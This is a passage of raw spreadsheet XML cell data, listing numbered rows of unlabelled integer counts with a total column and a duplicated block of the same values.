        <v>1</v>
      </c>
      <c r="D1235" s="8">
        <v>0</v>
      </c>
      <c r="E1235" s="8">
        <v>0</v>
      </c>
      <c r="F1235" s="8">
        <v>11</v>
      </c>
      <c r="G1235" s="8">
        <v>1</v>
      </c>
      <c r="H1235" s="8">
        <v>38</v>
      </c>
      <c r="K1235" s="7">
        <v>5043</v>
      </c>
      <c r="L1235" s="8">
        <v>25</v>
      </c>
      <c r="M1235" s="8">
        <v>1</v>
      </c>
      <c r="N1235" s="8">
        <v>0</v>
      </c>
      <c r="O1235" s="8">
        <v>0</v>
      </c>
      <c r="P1235" s="8">
        <v>11</v>
      </c>
      <c r="Q1235" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1236" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1236" s="7">
        <v>5045</v>
      </c>
      <c r="B1236" s="8">
        <v>26</v>
      </c>
      <c r="C1236" s="8">
        <v>0</v>
      </c>
      <c r="D1236" s="8">
        <v>2</v>
      </c>
      <c r="E1236" s="8">
        <v>10</v>
      </c>
      <c r="F1236" s="8">
        <v>4</v>
      </c>
      <c r="G1236" s="8">
        <v>2</v>
      </c>
      <c r="H1236" s="8">
        <v>44</v>
      </c>
      <c r="K1236" s="7">
        <v>5045</v>
      </c>
      <c r="L1236" s="8">
        <v>26</v>
      </c>
      <c r="M1236" s="8">
        <v>0</v>
      </c>
      <c r="N1236" s="8">
        <v>2</v>
      </c>
      <c r="O1236" s="8">
        <v>10</v>
      </c>
      <c r="P1236" s="8">
        <v>4</v>
      </c>
      <c r="Q1236" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1237" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1237" s="7">
        <v>5049</v>
      </c>
      <c r="B1237" s="8">
        <v>26</v>
      </c>
      <c r="C1237" s="8">
        <v>0</v>
      </c>
      <c r="D1237" s="8">
        <v>4</v>
      </c>
      <c r="E1237" s="8">
        <v>20</v>
      </c>
      <c r="F1237" s="8">
        <v>3</v>
      </c>
      <c r="G1237" s="8">
        <v>2</v>
      </c>
      <c r="H1237" s="8">
        <v>55</v>
      </c>
      <c r="K1237" s="7">
        <v>5049</v>
      </c>
      <c r="L1237" s="8">
        <v>26</v>
      </c>
      <c r="M1237" s="8">
        <v>0</v>
      </c>
      <c r="N1237" s="8">
        <v>4</v>
      </c>
      <c r="O1237" s="8">
        <v>20</v>
      </c>
      <c r="P1237" s="8">
        <v>3</v>
      </c>
      <c r="Q1237" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1238" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1238" s="7">
        <v>5053</v>
      </c>
      <c r="B1238" s="8">
        <v>26</v>
      </c>
      <c r="C1238" s="8">
        <v>1</v>
      </c>
      <c r="D1238" s="8">
        <v>0</v>
      </c>
      <c r="E1238" s="8">
        <v>0</v>
      </c>
      <c r="F1238" s="8">
        <v>6</v>
      </c>
      <c r="G1238" s="8">
        <v>5</v>
      </c>
      <c r="H1238" s="8">
        <v>38</v>
      </c>
      <c r="K1238" s="7">
        <v>5053</v>
      </c>
      <c r="L1238" s="8">
        <v>26</v>
      </c>
      <c r="M1238" s="8">
        <v>1</v>
      </c>
      <c r="N1238" s="8">
        <v>0</v>
      </c>
      <c r="O1238" s="8">
        <v>0</v>
      </c>
      <c r="P1238" s="8">
        <v>6</v>
      </c>
      <c r="Q1238" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1239" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1239" s="7">
        <v>5057</v>
      </c>
      <c r="B1239" s="8">
        <v>0</v>
      </c>
      <c r="C1239" s="8">
        <v>0</v>
      </c>
      <c r="D1239" s="8">
        <v>0</v>
      </c>
      <c r="E1239" s="8">
        <v>0</v>
      </c>
      <c r="F1239" s="8">
        <v>3</v>
      </c>
      <c r="G1239" s="8">
        <v>2</v>
      </c>
      <c r="H1239" s="8">
        <v>5</v>
      </c>
      <c r="K1239" s="7">
        <v>5057</v>
      </c>
      <c r="L1239" s="8">
        <v>0</v>
      </c>
      <c r="M1239" s="8">
        <v>0</v>
      </c>
      <c r="N1239" s="8">
        <v>0</v>
      </c>
      <c r="O1239" s="8">
        <v>0</v>
      </c>
      <c r="P1239" s="8">
        <v>3</v>
      </c>
      <c r="Q1239" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1240" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1240" s="7">
        <v>5060</v>
      </c>
      <c r="B1240" s="8">
        <v>0</v>
      </c>
      <c r="C1240" s="8">
        <v>0</v>
      </c>
      <c r="D1240" s="8">
        <v>7</v>
      </c>
      <c r="E1240" s="8">
        <v>0</v>
      </c>
      <c r="F1240" s="8">
        <v>3</v>
      </c>
      <c r="G1240" s="8">
        <v>1</v>
      </c>
      <c r="H1240" s="8">
        <v>11</v>
      </c>
      <c r="K1240" s="7">
        <v>5060</v>
      </c>
      <c r="L1240" s="8">
        <v>0</v>
      </c>
      <c r="M1240" s="8">
        <v>0</v>
      </c>
      <c r="N1240" s="8">
        <v>7</v>
      </c>
      <c r="O1240" s="8">
        <v>0</v>
      </c>
      <c r="P1240" s="8">
        <v>3</v>
      </c>
      <c r="Q1240" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1241" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1241" s="7">
        <v>5061</v>
      </c>
      <c r="B1241" s="8">
        <v>0</v>
      </c>
      <c r="C1241" s="8">
        <v>0</v>
      </c>
      <c r="D1241" s="8">
        <v>10</v>
      </c>
      <c r="E1241" s="8">
        <v>7</v>
      </c>
      <c r="F1241" s="8">
        <v>3</v>
      </c>
      <c r="G1241" s="8">
        <v>0</v>
      </c>
      <c r="H1241" s="8">
        <v>20</v>
      </c>
      <c r="K1241" s="7">
        <v>5061</v>
      </c>
      <c r="L1241" s="8">
        <v>0</v>
      </c>
      <c r="M1241" s="8">
        <v>0</v>
      </c>
      <c r="N1241" s="8">
        <v>10</v>
      </c>
      <c r="O1241" s="8">
        <v>7</v>
      </c>
      <c r="P1241" s="8">
        <v>3</v>
      </c>
      <c r="Q1241" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1242" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1242" s="7">
        <v>5063</v>
      </c>
      <c r="B1242" s="8">
        <v>0</v>
      </c>
      <c r="C1242" s="8">
        <v>0</v>
      </c>
      <c r="D1242" s="8">
        <v>0</v>
      </c>
      <c r="E1242" s="8">
        <v>2</v>
      </c>
      <c r="F1242" s="8">
        <v>0</v>
      </c>
      <c r="G1242" s="8">
        <v>2</v>
      </c>
      <c r="H1242" s="8">
        <v>4</v>
      </c>
      <c r="K1242" s="7">
        <v>5063</v>
      </c>
      <c r="L1242" s="8">
        <v>0</v>
      </c>
      <c r="M1242" s="8">
        <v>0</v>
      </c>
      <c r="N1242" s="8">
        <v>0</v>
      </c>
      <c r="O1242" s="8">
        <v>2</v>
      </c>
      <c r="P1242" s="8">
        <v>0</v>
      </c>
      <c r="Q1242" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1243" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1243" s="7">
        <v>5064</v>
      </c>
      <c r="B1243" s="8">
        <v>30</v>
      </c>
      <c r="C1243" s="8">
        <v>1</v>
      </c>
      <c r="D1243" s="8">
        <v>0</v>
      </c>
      <c r="E1243" s="8">
        <v>0</v>
      </c>
      <c r="F1243" s="8">
        <v>4</v>
      </c>
      <c r="G1243" s="8">
        <v>0</v>
      </c>
      <c r="H1243" s="8">
        <v>35</v>
      </c>
      <c r="K1243" s="7">
        <v>5064</v>
      </c>
      <c r="L1243" s="8">
        <v>30</v>
      </c>
      <c r="M1243" s="8">
        <v>1</v>
      </c>
      <c r="N1243" s="8">
        <v>0</v>
      </c>
      <c r="O1243" s="8">
        <v>0</v>
      </c>
      <c r="P1243" s="8">
        <v>4</v>
      </c>
      <c r="Q1243" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1244" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1244" s="7">
        <v>5065</v>
      </c>
      <c r="B1244" s="8">
        <v>26</v>
      </c>
      <c r="C1244" s="8">
        <v>1</v>
      </c>
      <c r="D1244" s="8">
        <v>2</v>
      </c>
      <c r="E1244" s="8">
        <v>5</v>
      </c>
      <c r="F1244" s="8">
        <v>0</v>
      </c>
      <c r="G1244" s="8">
        <v>1</v>
      </c>
      <c r="H1244" s="8">
        <v>35</v>
      </c>
      <c r="K1244" s="7">
        <v>5065</v>
      </c>
      <c r="L1244" s="8">
        <v>26</v>
      </c>
      <c r="M1244" s="8">
        <v>1</v>
      </c>
      <c r="N1244" s="8">
        <v>2</v>
      </c>
      <c r="O1244" s="8">
        <v>5</v>
      </c>
      <c r="P1244" s="8">
        <v>0</v>
      </c>
      <c r="Q1244" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1245" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1245" s="7">
        <v>5066</v>
      </c>
      <c r="B1245" s="8">
        <v>26</v>
      </c>
      <c r="C1245" s="8">
        <v>0</v>
      </c>
      <c r="D1245" s="8">
        <v>8</v>
      </c>
      <c r="E1245" s="8">
        <v>0</v>
      </c>
      <c r="F1245" s="8">
        <v>2</v>
      </c>
      <c r="G1245" s="8">
        <v>0</v>
      </c>
      <c r="H1245" s="8">
        <v>36</v>
      </c>
      <c r="K1245" s="7">
        <v>5066</v>
      </c>
      <c r="L1245" s="8">
        <v>26</v>
      </c>
      <c r="M1245" s="8">
        <v>0</v>
      </c>
      <c r="N1245" s="8">
        <v>8</v>
      </c>
      <c r="O1245" s="8">
        <v>0</v>
      </c>
      <c r="P1245" s="8">
        <v>2</v>
      </c>
      <c r="Q1245" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1246" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1246" s="7">
        <v>5067</v>
      </c>
      <c r="B1246" s="8">
        <v>26</v>
      </c>
      <c r="C1246" s="8">
        <v>1</v>
      </c>
      <c r="D1246" s="8">
        <v>0</v>
      </c>
      <c r="E1246" s="8">
        <v>0</v>
      </c>
      <c r="F1246" s="8">
        <v>17</v>
      </c>
      <c r="G1246" s="8">
        <v>4</v>
      </c>
      <c r="H1246" s="8">
        <v>48</v>
      </c>
      <c r="K1246" s="7">
        <v>5067</v>
      </c>
      <c r="L1246" s="8">
        <v>26</v>
      </c>
      <c r="M1246" s="8">
        <v>1</v>
      </c>
      <c r="N1246" s="8">
        <v>0</v>
      </c>
      <c r="O1246" s="8">
        <v>0</v>
      </c>
      <c r="P1246" s="8">
        <v>17</v>
      </c>
      <c r="Q1246" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1247" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1247" s="7">
        <v>5069</v>
      </c>
      <c r="B1247" s="8">
        <v>0</v>
      </c>
      <c r="C1247" s="8">
        <v>0</v>
      </c>
      <c r="D1247" s="8">
        <v>33</v>
      </c>
      <c r="E1247" s="8">
        <v>40</v>
      </c>
      <c r="F1247" s="8">
        <v>1</v>
      </c>
      <c r="G1247" s="8">
        <v>3</v>
      </c>
      <c r="H1247" s="8">
        <v>77</v>
      </c>
      <c r="K1247" s="7">
        <v>5069</v>
      </c>
      <c r="L1247" s="8">
        <v>0</v>
      </c>
      <c r="M1247" s="8">
        <v>0</v>
      </c>
      <c r="N1247" s="8">
        <v>33</v>
      </c>
      <c r="O1247" s="8">
        <v>40</v>
      </c>
      <c r="P1247" s="8">
        <v>1</v>
      </c>
      <c r="Q1247" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1248" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1248" s="7">
        <v>5070</v>
      </c>
      <c r="B1248" s="8">
        <v>6</v>
      </c>
      <c r="C1248" s="8">
        <v>0</v>
      </c>
      <c r="D1248" s="8">
        <v>4</v>
      </c>
      <c r="E1248" s="8">
        <v>0</v>
      </c>
      <c r="F1248" s="8">
        <v>4</v>
      </c>
      <c r="G1248" s="8">
        <v>2</v>
      </c>
      <c r="H1248" s="8">
        <v>16</v>
      </c>
      <c r="K1248" s="7">
        <v>5070</v>
      </c>
      <c r="L1248" s="8">
        <v>6</v>
      </c>
      <c r="M1248" s="8">
        <v>0</v>
      </c>
      <c r="N1248" s="8">
        <v>4</v>
      </c>
      <c r="O1248" s="8">
        <v>0</v>
      </c>
      <c r="P1248" s="8">
        <v>4</v>
      </c>
      <c r="Q1248" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1249" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1249" s="7">
        <v>5073</v>
      </c>
      <c r="B1249" s="8">
        <v>24</v>
      </c>
      <c r="C1249" s="8">
        <v>1</v>
      </c>
      <c r="D1249" s="8">
        <v>0</v>
      </c>
      <c r="E1249" s="8">
        <v>0</v>
      </c>
      <c r="F1249" s="8">
        <v>1</v>
      </c>
      <c r="G1249" s="8">
        <v>1</v>
      </c>
      <c r="H1249" s="8">
        <v>27</v>
      </c>
      <c r="K1249" s="7">
        <v>5073</v>
      </c>
      <c r="L1249" s="8">
        <v>24</v>
      </c>
      <c r="M1249" s="8">
        <v>1</v>
      </c>
      <c r="N1249" s="8">
        <v>0</v>
      </c>
      <c r="O1249" s="8">
        <v>0</v>
      </c>
      <c r="P1249" s="8">
        <v>1</v>
      </c>
      <c r="Q1249" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1250" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1250" s="7">
        <v>5074</v>
      </c>
      <c r="B1250" s="8">
        <v>6</v>
      </c>
      <c r="C1250" s="8">
        <v>1</v>
      </c>
      <c r="D1250" s="8">
        <v>0</v>
      </c>
      <c r="E1250" s="8">
        <v>20</v>
      </c>
      <c r="F1250" s="8">
        <v>0</v>
      </c>
      <c r="G1250" s="8">
        <v>10</v>
      </c>
      <c r="H1250" s="8">
        <v>37</v>
      </c>
      <c r="K1250" s="7">
        <v>5074</v>
      </c>
      <c r="L1250" s="8">
        <v>6</v>
      </c>
      <c r="M1250" s="8">
        <v>1</v>
      </c>
      <c r="N1250" s="8">
        <v>0</v>
      </c>
      <c r="O1250" s="8">
        <v>20</v>
      </c>
      <c r="P1250" s="8">
        <v>0</v>
      </c>
      <c r="Q1250" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="1251" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1251" s="7">
        <v>5075</v>
      </c>
      <c r="B1251" s="8">
        <v>0</v>
      </c>
      <c r="C1251" s="8">
        <v>0</v>
      </c>
      <c r="D1251" s="8">
        <v>0</v>
      </c>
      <c r="E1251" s="8">
        <v>6</v>
      </c>
      <c r="F1251" s="8">
        <v>2</v>
      </c>
      <c r="G1251" s="8">
        <v>2</v>
      </c>
      <c r="H1251" s="8">
        <v>10</v>
      </c>
      <c r="K1251" s="7">
        <v>5075</v>
      </c>
      <c r="L1251" s="8">
        <v>0</v>
      </c>
      <c r="M1251" s="8">
        <v>0</v>
      </c>
      <c r="N1251" s="8">
        <v>0</v>
      </c>
      <c r="O1251" s="8">
        <v>6</v>
      </c>
      <c r="P1251" s="8">
        <v>2</v>
      </c>
      <c r="Q1251" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1252" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1252" s="7">
        <v>5077</v>
      </c>
      <c r="B1252" s="8">
        <v>26</v>
      </c>
      <c r="C1252" s="8">
        <v>0</v>
      </c>
      <c r="D1252" s="8">
        <v>0</v>
      </c>
      <c r="E1252" s="8">
        <v>0</v>
      </c>
      <c r="F1252" s="8">
        <v>7</v>
      </c>
      <c r="G1252" s="8">
        <v>1</v>
      </c>
      <c r="H1252" s="8">
        <v>34</v>
      </c>
      <c r="K1252" s="7">
        <v>5077</v>
      </c>
      <c r="L1252" s="8">
        <v>26</v>
      </c>
      <c r="M1252" s="8">
        <v>0</v>
      </c>
      <c r="N1252" s="8">
        <v>0</v>
      </c>
      <c r="O1252" s="8">
        <v>0</v>
      </c>
      <c r="P1252" s="8">
        <v>7</v>
      </c>
      <c r="Q1252" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1253" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1253" s="7">
        <v>5078</v>
      </c>
      <c r="B1253" s="8">
        <v>25</v>
      </c>
      <c r="C1253" s="8">
        <v>1</v>
      </c>
      <c r="D1253" s="8">
        <v>0</v>
      </c>
      <c r="E1253" s="8">
        <v>4</v>
      </c>
      <c r="F1253" s="8">
        <v>1</v>
      </c>
      <c r="G1253" s="8">
        <v>1</v>
      </c>
      <c r="H1253" s="8">
        <v>32</v>
      </c>
      <c r="K1253" s="7">
        <v>5078</v>
      </c>
      <c r="L1253" s="8">
        <v>25</v>
      </c>
      <c r="M1253" s="8">
        <v>1</v>
      </c>
      <c r="N1253" s="8">
        <v>0</v>
      </c>
      <c r="O1253" s="8">
        <v>4</v>
      </c>
      <c r="P1253" s="8">
        <v>1</v>
      </c>
      <c r="Q1253" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1254" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1254" s="7">
        <v>5079</v>
      </c>
      <c r="B1254" s="8">
        <v>25</v>
      </c>
      <c r="C1254" s="8">
        <v>1</v>
      </c>
      <c r="D1254" s="8">
        <v>4</v>
      </c>
      <c r="E1254" s="8">
        <v>4</v>
      </c>
      <c r="F1254" s="8">
        <v>2</v>
      </c>
      <c r="G1254" s="8">
        <v>2</v>
      </c>
      <c r="H1254" s="8">
        <v>38</v>
      </c>
      <c r="K1254" s="7">
        <v>5079</v>
      </c>
      <c r="L1254" s="8">
        <v>25</v>
      </c>
      <c r="M1254" s="8">
        <v>1</v>
      </c>
      <c r="N1254" s="8">
        <v>4</v>
      </c>
      <c r="O1254" s="8">
        <v>4</v>
      </c>
      <c r="P1254" s="8">
        <v>2</v>
      </c>
      <c r="Q1254" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1255" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1255" s="7">
        <v>5081</v>
      </c>
      <c r="B1255" s="8">
        <v>5</v>
      </c>
      <c r="C1255" s="8">
        <v>1</v>
      </c>
      <c r="D1255" s="8">
        <v>0</v>
      </c>
      <c r="E1255" s="8">
        <v>2</v>
      </c>
      <c r="F1255" s="8">
        <v>0</v>
      </c>
      <c r="G1255" s="8">
        <v>3</v>
      </c>
      <c r="H1255" s="8">
        <v>11</v>
      </c>
      <c r="K1255" s="7">
        <v>5081</v>
      </c>
      <c r="L1255" s="8">
        <v>5</v>
      </c>
      <c r="M1255" s="8">
        <v>1</v>
      </c>
      <c r="N1255" s="8">
        <v>0</v>
      </c>
      <c r="O1255" s="8">
        <v>2</v>
      </c>
      <c r="P1255" s="8">
        <v>0</v>
      </c>
      <c r="Q1255" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1256" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1256" s="7">
        <v>5083</v>
      </c>
      <c r="B1256" s="8">
        <v>24</v>
      </c>
      <c r="C1256" s="8">
        <v>1</v>
      </c>
      <c r="D1256" s="8">
        <v>0</v>
      </c>
      <c r="E1256" s="8">
        <v>1</v>
      </c>
      <c r="F1256" s="8">
        <v>1</v>
      </c>
      <c r="G1256" s="8">
        <v>1</v>
      </c>
      <c r="H1256" s="8">
        <v>28</v>
      </c>
      <c r="K1256" s="7">
        <v>5083</v>
      </c>
      <c r="L1256" s="8">
        <v>24</v>
      </c>
      <c r="M1256" s="8">
        <v>1</v>
      </c>
      <c r="N1256" s="8">
        <v>0</v>
      </c>
      <c r="O1256" s="8">
        <v>1</v>
      </c>
      <c r="P1256" s="8">
        <v>1</v>
      </c>
      <c r="Q1256" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1257" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1257" s="7">
        <v>5086</v>
      </c>
      <c r="B1257" s="8">
        <v>30</v>
      </c>
      <c r="C1257" s="8">
        <v>1</v>
      </c>
      <c r="D1257" s="8">
        <v>10</v>
      </c>
      <c r="E1257" s="8">
        <v>0</v>
      </c>
      <c r="F1257" s="8">
        <v>2</v>
      </c>
      <c r="G1257" s="8">
        <v>1</v>
      </c>
      <c r="H1257" s="8">
        <v>44</v>
      </c>
      <c r="K1257" s="7">
        <v>5086</v>
      </c>
      <c r="L1257" s="8">
        <v>30</v>
      </c>
      <c r="M1257" s="8">
        <v>1</v>
      </c>
      <c r="N1257" s="8">
        <v>10</v>
      </c>
      <c r="O1257" s="8">
        <v>0</v>
      </c>
      <c r="P1257" s="8">
        <v>2</v>
      </c>
      <c r="Q1257" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1258" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1258" s="7">
        <v>5087</v>
      </c>
      <c r="B1258" s="8">
        <v>15</v>
      </c>
      <c r="C1258" s="8">
        <v>1</v>
      </c>
      <c r="D1258" s="8">
        <v>0</v>
      </c>
      <c r="E1258" s="8">
        <v>0</v>
      </c>
      <c r="F1258" s="8">
        <v>4</v>
      </c>
      <c r="G1258" s="8">
        <v>0</v>
      </c>
      <c r="H1258" s="8">
        <v>20</v>
      </c>
      <c r="K1258" s="7">
        <v>5087</v>
      </c>
      <c r="L1258" s="8">
        <v>15</v>
      </c>
      <c r="M1258" s="8">
        <v>1</v>
      </c>
      <c r="N1258" s="8">
        <v>0</v>
      </c>
      <c r="O1258" s="8">
        <v>0</v>
      </c>
      <c r="P1258" s="8">
        <v>4</v>
      </c>
      <c r="Q1258" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1259" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1259" s="7">
        <v>5088</v>
      </c>
      <c r="B1259" s="8">
        <v>15</v>
      </c>
      <c r="C1259" s="8">
        <v>1</v>
      </c>
      <c r="D1259" s="8">
        <v>0</v>
      </c>
      <c r="E1259" s="8">
        <v>0</v>
      </c>
      <c r="F1259" s="8">
        <v>4</v>
      </c>
      <c r="G1259" s="8">
        <v>0</v>
      </c>
      <c r="H1259" s="8">
        <v>20</v>
      </c>
      <c r="K1259" s="7">
        <v>5088</v>
      </c>
      <c r="L1259" s="8">
        <v>15</v>
      </c>
      <c r="M1259" s="8">
        <v>1</v>
      </c>
      <c r="N1259" s="8">
        <v>0</v>
      </c>
      <c r="O1259" s="8">
        <v>0</v>
      </c>
      <c r="P1259" s="8">
        <v>4</v>
      </c>
      <c r="Q1259" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1260" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1260" s="7">
        <v>5090</v>
      </c>
      <c r="B1260" s="8">
        <v>6</v>
      </c>
      <c r="C1260" s="8">
        <v>2</v>
      </c>
      <c r="D1260" s="8">
        <v>3</v>
      </c>
      <c r="E1260" s="8">
        <v>0</v>
      </c>
      <c r="F1260" s="8">
        <v>14</v>
      </c>
      <c r="G1260" s="8">
        <v>2</v>
      </c>
      <c r="H1260" s="8">
        <v>27</v>
      </c>
      <c r="K1260" s="7">
        <v>5090</v>
      </c>
      <c r="L1260" s="8">
        <v>6</v>
      </c>
      <c r="M1260" s="8">
        <v>2</v>
      </c>
      <c r="N1260" s="8">
        <v>3</v>
      </c>
      <c r="O1260" s="8">
        <v>0</v>
      </c>
      <c r="P1260" s="8">
        <v>14</v>
      </c>
      <c r="Q1260" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1261" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1261" s="7">
        <v>5093</v>
      </c>
      <c r="B1261" s="8">
        <v>100</v>
      </c>
      <c r="C1261" s="8">
        <v>0</v>
      </c>
      <c r="D1261" s="8">
        <v>4</v>
      </c>
      <c r="E1261" s="8">
        <v>4</v>
      </c>
      <c r="F1261" s="8">
        <v>4</v>
      </c>
      <c r="G1261" s="8">
        <v>2</v>
      </c>
      <c r="H1261" s="8">
        <v>114</v>
      </c>
      <c r="K1261" s="7">
        <v>5093</v>
      </c>
      <c r="L1261" s="8">
        <v>100</v>
      </c>
      <c r="M1261" s="8">
        <v>0</v>
      </c>
      <c r="N1261" s="8">
        <v>4</v>
      </c>
      <c r="O1261" s="8">
        <v>4</v>
      </c>
      <c r="P1261" s="8">
        <v>4</v>
      </c>
      <c r="Q1261" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1262" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1262" s="7">
        <v>5095</v>
      </c>
      <c r="B1262" s="8">
        <v>26</v>
      </c>
      <c r="C1262" s="8">
        <v>2</v>
      </c>
      <c r="D1262" s="8">
        <v>8</v>
      </c>
      <c r="E1262" s="8">
        <v>0</v>
      </c>
      <c r="F1262" s="8">
        <v>19</v>
      </c>
      <c r="G1262" s="8">
        <v>2</v>
      </c>
      <c r="H1262" s="8">
        <v>57</v>
      </c>
      <c r="K1262" s="7">
        <v>5095</v>
      </c>
      <c r="L1262" s="8">
        <v>26</v>
      </c>
      <c r="M1262" s="8">
        <v>2</v>
      </c>
      <c r="N1262" s="8">
        <v>8</v>
      </c>
      <c r="O1262" s="8">
        <v>0</v>
      </c>
      <c r="P1262" s="8">
        <v>19</v>
      </c>
      <c r="Q1262" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1263" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1263" s="7">
        <v>5096</v>
      </c>
      <c r="B1263" s="8">
        <v>26</v>
      </c>
      <c r="C1263" s="8">
        <v>1</v>
      </c>
      <c r="D1263" s="8">
        <v>0</v>
      </c>
      <c r="E1263" s="8">
        <v>0</v>
      </c>
      <c r="F1263" s="8">
        <v>7</v>
      </c>
      <c r="G1263" s="8">
        <v>2</v>
      </c>
      <c r="H1263" s="8">
        <v>36</v>
      </c>
      <c r="K1263" s="7">
        <v>5096</v>
      </c>
      <c r="L1263" s="8">
        <v>26</v>
      </c>
      <c r="M1263" s="8">
        <v>1</v>
      </c>
      <c r="N1263" s="8">
        <v>0</v>
      </c>
      <c r="O1263" s="8">
        <v>0</v>
      </c>
      <c r="P1263" s="8">
        <v>7</v>
      </c>
      <c r="Q1263" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1264" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1264" s="7">
        <v>5098</v>
      </c>
      <c r="B1264" s="8">
        <v>26</v>
      </c>
      <c r="C1264" s="8">
        <v>0</v>
      </c>
      <c r="D1264" s="8">
        <v>0</v>
      </c>
      <c r="E1264" s="8">
        <v>0</v>
      </c>
      <c r="F1264" s="8">
        <v>10</v>
      </c>
      <c r="G1264" s="8">
        <v>10</v>
      </c>
      <c r="H1264" s="8">
        <v>46</v>
      </c>
      <c r="K1264" s="7">
        <v>5098</v>
      </c>
      <c r="L1264" s="8">
        <v>26</v>
      </c>
      <c r="M1264" s="8">
        <v>0</v>
      </c>
      <c r="N1264" s="8">
        <v>0</v>
      </c>
      <c r="O1264" s="8">
        <v>0</v>
      </c>
      <c r="P1264" s="8">
        <v>10</v>
      </c>
      <c r="Q1264" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="1265" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1265" s="7">
        <v>5099</v>
      </c>
      <c r="B1265" s="8">
        <v>26</v>
      </c>
      <c r="C1265" s="8">
        <v>1</v>
      </c>
      <c r="D1265" s="8">
        <v>0</v>
      </c>
      <c r="E1265" s="8">
        <v>0</v>
      </c>
      <c r="F1265" s="8">
        <v>1</v>
      </c>
      <c r="G1265" s="8">
        <v>3</v>
      </c>
      <c r="H1265" s="8">
        <v>31</v>
      </c>
      <c r="K1265" s="7">
        <v>5099</v>
      </c>
      <c r="L1265" s="8">
        <v>26</v>
      </c>
      <c r="M1265" s="8">
        <v>1</v>
      </c>
      <c r="N1265" s="8">
        <v>0</v>
      </c>
      <c r="O1265" s="8">
        <v>0</v>
      </c>
      <c r="P1265" s="8">
        <v>1</v>
      </c>
      <c r="Q1265" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1266" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1266" s="7">
        <v>5101</v>
      </c>
      <c r="B1266" s="8">
        <v>25</v>
      </c>
      <c r="C1266" s="8">
        <v>1</v>
      </c>
      <c r="D1266" s="8">
        <v>0</v>
      </c>
      <c r="E1266" s="8">
        <v>3</v>
      </c>
      <c r="F1266" s="8">
        <v>3</v>
      </c>
      <c r="G1266" s="8">
        <v>1</v>
      </c>
      <c r="H1266" s="8">
        <v>33</v>
      </c>
      <c r="K1266" s="7">
        <v>5101</v>
      </c>
      <c r="L1266" s="8">
        <v>25</v>
      </c>
      <c r="M1266" s="8">
        <v>1</v>
      </c>
      <c r="N1266" s="8">
        <v>0</v>
      </c>
      <c r="O1266" s="8">
        <v>3</v>
      </c>
      <c r="P1266" s="8">
        <v>3</v>
      </c>
      <c r="Q1266" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1267" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1267" s="7">
        <v>5102</v>
      </c>
      <c r="B1267" s="8">
        <v>22</v>
      </c>
      <c r="C1267" s="8">
        <v>1</v>
      </c>
      <c r="D1267" s="8">
        <v>4</v>
      </c>
      <c r="E1267" s="8">
        <v>2</v>
      </c>
      <c r="F1267" s="8">
        <v>4</v>
      </c>
      <c r="G1267" s="8">
        <v>2</v>
      </c>
      <c r="H1267" s="8">
        <v>35</v>
      </c>
      <c r="K1267" s="7">
        <v>5102</v>
      </c>
      <c r="L1267" s="8">
        <v>22</v>
      </c>
      <c r="M1267" s="8">
        <v>1</v>
      </c>
      <c r="N1267" s="8">
        <v>4</v>
      </c>
      <c r="O1267" s="8">
        <v>2</v>
      </c>
      <c r="P1267" s="8">
